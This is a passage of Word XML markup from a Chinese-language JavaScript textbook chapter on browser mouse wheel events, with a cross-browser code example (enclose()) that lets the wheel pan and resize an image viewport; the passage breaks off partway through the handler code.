        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>"DOMMouseScroll"</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范草案</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>建议使用事件名</w:t>
      </w:r>
      <w:r>
        <w:t>"wheel"</w:t>
      </w:r>
      <w:r>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:t>"mousewheel"</w:t>
      </w:r>
      <w:r>
        <w:t>。除了事件名的不同，向各种事件传递的事件对象也使用了不同的属性名来指定滚轮发生的旋转量。最后注意，基础硬件也会导致鼠标滚轮之间的区别。某些硬件允许向前向后的一维滚动，</w:t>
      </w:r>
      <w:r>
        <w:t>而另一些（尤其是在</w:t>
      </w:r>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:t>上）也允许向左向右滚动（在这些鼠标上，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>滚轮</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>其实是轨迹球）。</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>规范草案甚至包括支持三维鼠标</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>滚轮</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，除了上下左右，它还能报告顺时针或逆时针旋转。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给</w:t>
      </w:r>
      <w:r>
        <w:t>"mousewheel"</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序的事件对象有</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>属性，其指定用户滚动滚轮有多远。远离用户方向的一次鼠标滚轮</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>单击</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>值通常是</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:t>，而接近用户方向的一次</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>单击</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:t>-120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>中，为了支持使用二维轨迹球而非一维滚轮的</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>鼠标，除了</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>属性外，事件对象还有</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDeltaX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDeltaY</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDeltaY</w:t>
      </w:r>
      <w:r>
        <w:t>的值一直相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以使用非标准的</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseScroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件取代</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>，使用事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>detail</w:t>
      </w:r>
      <w:r>
        <w:t>属性取代</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>。但是，</w:t>
      </w:r>
      <w:r>
        <w:t>detail</w:t>
      </w:r>
      <w:r>
        <w:t>属性值的缩放比率和正负符号不同于</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>detail</w:t>
      </w:r>
      <w:r>
        <w:t>值乘以</w:t>
      </w:r>
      <w:r>
        <w:t>-40</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>值相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在写本章时，</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范草案标准定义了</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件作为</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseSc</w:t>
      </w:r>
      <w:r>
        <w:t>roll</w:t>
      </w:r>
      <w:r>
        <w:t>的标准版本。传递给</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>序的事件对象将有</w:t>
      </w:r>
      <w:r>
        <w:t>deltaX</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>deltaY</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>deltaZ</w:t>
      </w:r>
      <w:r>
        <w:t>属性，以指定三个维度的旋转。这些值必须乘以</w:t>
      </w:r>
      <w:r>
        <w:t>-120</w:t>
      </w:r>
      <w:r>
        <w:t>才和</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件的</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>值和正负符号相匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于所有这些事件类型来说，其事件对象就像鼠标事件对象：它包括鼠标指针的坐标和键盘辅助键的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-3</w:t>
      </w:r>
      <w:r>
        <w:t>演示了如何使用鼠标滚轮事件和如何实现跨平台的互用性。它定义了</w:t>
      </w:r>
      <w:r>
        <w:t>enclose()</w:t>
      </w:r>
      <w:r>
        <w:t>函数在一个较大的内容元素（比如图片）周围包装了一个指定尺寸的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>窗体</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>视口</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，并定义了鼠标滚轮事件处理</w:t>
      </w:r>
      <w:r>
        <w:t>程序让用户既能在视口内移动内容元素也能调整视口大小。可以像下面这样在代码中使用</w:t>
      </w:r>
      <w:r>
        <w:t>enclose()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="whenReady.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="Enclose.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>whenReady(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enclose(document.getElementById("content"),400,200,-200,-300);</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style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>div.enclosure{bo</w:t>
      </w:r>
      <w:r>
        <w:t>rder:solid black 10px;margin:10px;}</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img id="content"src="testimage.jpg"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了能够在所有常用浏览器中正确地工作，例</w:t>
      </w:r>
      <w:r>
        <w:t>17-3</w:t>
      </w:r>
      <w:r>
        <w:t>必须执行一些浏览器测试（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.4.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）。这个示例提前使用了</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>规范草案，包括在代码中使用了</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件，当浏览器实现它时即可使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。它也包含未来的一些证明，当</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>开始支持</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件时就停止使用</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseScroll</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，例</w:t>
      </w:r>
      <w:r>
        <w:t>17-3</w:t>
      </w:r>
      <w:r>
        <w:t>也是演示元素几何形状和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定位技术的示例，这些技术会在</w:t>
      </w:r>
      <w:r>
        <w:t>15.8</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>16.2.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-3</w:t>
      </w:r>
      <w:r>
        <w:t>：处理鼠标滚轮事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>把内容元素装入到一个指定大小（最小是</w:t>
      </w:r>
      <w:r>
        <w:t>50×50</w:t>
      </w:r>
      <w:r>
        <w:t>）的窗体或视口内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>可选参数</w:t>
      </w:r>
      <w:r>
        <w:t>contentX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>contentY</w:t>
      </w:r>
      <w:r>
        <w:t>指定内容相对于窗体的初始偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>（如果指定，它们必须＜</w:t>
      </w:r>
      <w:r>
        <w:t>=0</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个窗体有</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它允许用户</w:t>
      </w:r>
      <w:r>
        <w:t>平移元素和缩放窗体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function enclose(content,framewidth,frameheight,contentX,contentY){//</w:t>
      </w:r>
      <w:r>
        <w:t>这些参数不仅仅是初始值，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它们保存当前状态，能被</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序使用和修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>framewidth=Math.max(framewidth,50);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frameheight=Math.max(frameheight,50);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contentX=Math.min(contentX,0)||0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contentY=Math.min(conte</w:t>
      </w:r>
      <w:r>
        <w:t>ntY,0)||0;//</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>元素，且设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类名和样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var frame=document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.className="enclosure";//</w:t>
      </w:r>
      <w:r>
        <w:t>这样我们能在样式表中定义样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.style.width=framewidth+"px";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>的尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.style.height=frameheight+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.style.overflow="hidden";//</w:t>
      </w:r>
      <w:r>
        <w:t>没有滚动条，不能溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.sty</w:t>
      </w:r>
      <w:r>
        <w:t>le.boxSizing="border-box";//border-box</w:t>
      </w:r>
      <w:r>
        <w:t>简化了调整</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>大小的计算</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.style.webkitBoxSizing="border-box";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.style.MozBoxSizing="border-box";//</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>放入文档中，并把内容移入</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>content.parentNode.insertBefore(frame,content);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.appendChild(content);//</w:t>
      </w:r>
      <w:r>
        <w:t>确定元素相对于</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>content.style.position="relative";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>content.style.left=contentX+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>content.style.top=contentY+"px";//</w:t>
      </w:r>
      <w:r>
        <w:t>我们将需要针对下面一些特定浏览器怪癖进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var isMacWebkit=(navigator.userAgent.indexOf("Macintosh")!==-1</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>navigator.userAgent.indexOf("WebKit")!==-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>isFirefox=(navigator.userAgent.indexOf("Gecko")!==-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.onwheel=wheelHandler;//</w:t>
      </w:r>
      <w:r>
        <w:t>未来浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.onmousewheel=wheelHandler;//</w:t>
      </w:r>
      <w:r>
        <w:t>大多数当前浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isFirefox)//</w:t>
      </w:r>
      <w:r>
        <w:t>仅</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.addEventListener("DOMMouseScroll",wheelHandler,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function wheelHand</w:t>
      </w:r>
      <w:r>
        <w:t>ler(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var e=event||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>标准或</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象、</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象（包括</w:t>
      </w:r>
      <w:r>
        <w:t>2D</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>1D</w:t>
      </w:r>
      <w:r>
        <w:t>形式）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseScroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象的属性，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从事件对象中提取旋转量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>绽放</w:t>
      </w:r>
      <w:r>
        <w:t>delta</w:t>
      </w:r>
      <w:r>
        <w:t>以便一次鼠标滚轮</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>单击</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>相对于屏幕的缩放增量是</w:t>
      </w:r>
      <w:r>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:t>像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果未来浏览器在同一事件上同时触发</w:t>
      </w:r>
      <w:r>
        <w:t>"wheel"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"mousewheel"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里最终会重复计算，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
